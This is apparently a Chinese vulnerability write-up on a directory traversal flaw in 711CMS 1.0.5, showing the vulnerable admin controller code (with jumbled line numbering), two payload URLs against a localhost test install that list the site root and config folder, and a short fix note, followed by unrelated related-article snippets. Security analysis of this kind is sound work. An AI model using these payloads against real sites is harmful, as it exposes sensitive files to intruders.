0x00 环境准备

711CMS官网: https://www.711cms.com/

网站源码版本:711CMS 1.0.5 正式版(发布时间:2018-01-20)

程序源码下载:https://www.711cms.com/versions/711cms_V1.0.5.zip

测试网站首页:

0x01 代码分析

1、漏洞文件位置:/admin/controllers/App.php  第323-393行:

  1. public function file() {
  2. $token = $this->input->get('token', true);
  3. $time = $this->input->get('time', true);
  4. $folder = $this->input->get('folder',true);
  5. $folder = $folder ? $folder : '/';
  6. $type = $this->input->get('type', true);
  7. $folder = urldecode($folder);
  8. $arr_token = array(
  9. 10.         'folder' => $folder,
  10. 11.         'type' => $type,
  11. 12.         'time' => $time
  12. 13.     );
  13. 14.     $private = md5($this->input->server('HTTP_HOST') . $this->_site['auth_code']);
  14. 15.     $token2 = appToken($arr_token, $private);
  15. 16.     if ($token2 != $token) {
  16. 17.         $folder = '/';
  17. 18.     }
  18. 19.     if (strpos($folder, '..') !== false || strpos($folder, ':') !== false) {
  19. 20.         $folder = '/';
  20. 21.     }
  21. 22.
  22. 23.     $type = $type ? $type : 'apk|jpg|gif|png';
  23. 24.     $this->_data['type'] = $type;
  24. 25.
  25. 26.     $arr_type = explode('|', $type);
  26. 27.     $arr_type_num = count($arr_type);
  27. 28.     if ($folder) {
  28. 29.         $dir = root_path($folder);
  29. 30.         $arr_data = array();
  30. 31.         $arr_data['folders'] = array();
  31. 32.         $arr_data['apks'] = array();
  32. 33.         $arr_data['images'] = array();
  33. 34.         $scan_result = scandir($dir);
  34. 35.         foreach ($scan_result as $key => $value) {
  35. 36.             if ($value == '.' || $value == '..') {
  36. 37.                 continue;
  37. 38.             }
  38. 39.             if (is_dir($dir . $value)) {
  39. 40.                 $arr_data['folders'][] = array(
  40. 41.                     'folder' => $value,
  41. 42.                     'size' => filesize($dir . $value) ? filesize($dir . $value) : 0,
  42. 43.                     'date' => filemtime($dir . $value) ? filemtime($dir . $value) : time() - 3600 * 12
  43. 44.                 );
  44. 45.             } else {
  45. 46.                 $type = explode('.', $value);
  46. 47.                 $type = array_reverse($type);
  47. 48.                 if (in_array($type[0], $arr_type) && $arr_type_num == 1) {
  48. 49.                     $arr_data['apks'][] = array(
  49. 50.                         'apk' => $value,
  50. 51.                         'size' => filesize($dir . $value) ? filesize($dir . $value) : 0,
  51. 52.                         'date' => filemtime($dir . $value) ? filemtime($dir . $value) : time() - 3600 * 12
  52. 53.                     );
  53. 54.                 }
  54. 55.                 if (in_array($type[0], $arr_type) && $arr_type_num > 1) {
  55. 56.                     $arr_data['images'][] = array(
  56. 57.                         'image' => $value,
  57. 58.                         'size' => filesize($dir . $value) ? filesize($dir . $value) : 0,
  58. 59.                         'date' => filemtime($dir . $value) ? filemtime($dir . $value) : time() - 3600 * 12
  59. 60.                     );
  60. 61.                 }
  61. 62.             }
  62. 63.         }
  63. 64.         $this->_data['file'] = $arr_data;
  64. 65.         $this->_data['folder'] = $folder;
  65. 66.         $this->_data['time'] = time();
  66. 67.         $this->_data['private'] = $private;
  67. 68.
  68. 69.     }
  69. 70.     $this->loadView('/App/file');

71. }

这段函数获取参数进行简单的处理,然后验证token,根据$folder的值进行列目录,然后再根据$type选择类型展示。参数在传递过程中未进行任何有效过滤,

导致程序在实现上存在目录遍历漏洞,攻击者可利用该漏洞获取敏感信息。

0x02 漏洞利用

1、登录后台,构造url,获取网站目录结构。

获取网站根目录Payload:

http://127.0.0.1/admin.php?c=App&m=file&folder=/&type=apk|jpg|gif|png

2、程序默认展示apk|jpg|gif|png四种类型的结果,我们可以通过改变$type的值来改变展示的类型。

http://127.0.0.1/admin.php?c=App&m=file&folder=/admin/config/&type=apk|jpg|gif|png|php

0x03 修复建议

1、正则判断用户输入的参数的格式,看输入的格式是否合法:这个方法的匹配最为准确和细致,但是有很大难度,需要大量时间配置规则。

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

【代码审计】711cms_V1.0.5 目录遍历漏洞分析的更多相关文章

  1. 【代码审计】大米CMS_V5.5.3 目录遍历漏洞分析

      0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...

  2. 【代码审计】CLTPHP_v5.5.3后台目录遍历漏洞分析

      0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...

  3. [cyber security][php]pfSense目录遍历漏洞分析

    0×00 导言 pfSense是一个基于FreeBSD,专为防火墙和路由器功能定制的开源版本. 在本文中,我们将向大家介绍在pfSense的2.1.3以及更低版本中的CVE-2014-4690漏洞:对 ...

  4. 网络安全学习阶段性总结:SQL注入|SSRF攻击|OS命令注入|身份验证漏洞|事物逻辑漏洞|目录遍历漏洞

    目录 SQL注入 什么是SQL注入? 掌握SQL注入之前需要了解的知识点 SQL注入情况流程分析 有完整的回显报错(最简单的情况)--检索数据: 在HTTP报文中利用注释---危险操作 检索隐藏数据: ...

  5. nginx解析漏洞,配置不当,目录遍历漏洞环境搭建、漏洞复现

    nginx解析漏洞,配置不当,目录遍历漏洞复现 1.Ubuntu14.04安装nginx-php5-fpm 安装了nginx,需要安装以下依赖 sudo apt-get install libpcre ...

  6. Kali学习笔记31:目录遍历漏洞、文件包含漏洞

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 目录遍历漏洞: 应用程序如果有操作文件的功能,限制不严 ...

  7. HttpClient使用之下载远程服务器中的文件(注意目录遍历漏洞)

    参考文献: http://bbs.csdn.net/topics/390952011 http://blog.csdn.net/ljj_9/article/details/53306468 1.下载地 ...

  8. 目录遍历漏洞简介 转载于h3c

    参考文章: 攻防:目录遍历漏洞简介

  9. nginx目录遍历漏洞复现

    nginx目录遍历漏洞复现 一.漏洞描述 Nginx的目录遍历与apache一样,属于配置方面的问题,错误的配置可导致目录遍历与源码泄露. 二.漏洞原理 1. 修改nginx.conf,在如下图位置添 ...

随机推荐

  1. PHP中“==”运算符的安全问题

    前言 PHP是一种通用的开源脚本语言,它的语法混合了C,Java,以及Perl等优秀语言的语法.除此之外,它还提供了大量的函数库可供开发人员使用.但是,如果使用不当,PHP也会给应用程序带来非常大的安 ...

  2. iframe 父页面与子页面之间的方法的相互调用【转】

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...

  3. 安卓程序代写 网上程序代写[原]Android开发技巧--Application

    1. Application用途 创建Application时机 : Application在启动的时候会调用Application无参的构造方法创建实例; Application构造方法 : App ...

  4. selenium(java)处理HTML5的视频播放

    大多数浏览器使用控件(如 Flash) 来播放规频,但是,不同的浏览器需要使用不同的插件.HTML5 定义了一个新的元素<video>,,指定了一个标准的方式来嵌入电影片段.IE9+.Fi ...

  5. python一天一题(2)

    python查询mysql数据库 import pymysql host = '192.168.74.5' user = 'root' passwd ='root' port = 3310 db = ...

  6. android手机如何获取手机号

    两个方案:1 通过android.permission.READ_PHONE_STATE读取  2 通过短信过滤,读取手机号. 按照第1个方案,AndroidManifest.xml需要添加 < ...

  7. SpringMVC系列(一)SpringMVC概述和搭建SpringMVC的第一个helloWord入门程序

    一.SpringMVC 概述 • Spring为展现层提供的基于MVC设计理念的优秀的Web框架,是目前最主流的MVC框架之一 • Spring3.0 后全面超越 Struts2,成为最优秀的 MVC ...

  8. 嵌入式开发之zynq——赛灵思的一款两a9加一fpga芯片的开发板

    没办法,回家入职新公司,做通信的,用到这款zynq加ad9163射频架构的开发版,要我做驱动,这可是初次接触zynq,带fpga的集成芯片,心里还是有点惊喜和忧愁,忧愁怎么最快啃下这个硬骨头,好吧上网 ...

  9. 让不支持MVC3的服务器/空间/虚拟主机 支持MVC3 (前提是必须支持 .net 4.0才可以)

    在有的时候,你用的VPS,服务器或者是虚拟空间可能是没有安装MVC3的,下面我们就自己来手动来让虚拟空间支持(前提是空间必须是.net 4.0的,因为MVC3是在4.0下运行) 我们先在web.con ...

  10. Python资料收藏(杂乱版)

    http://blog.csdn.net/vagrxie/article/category/343814 http://blog.sina.com.cn/s/articlelist_280149524 ...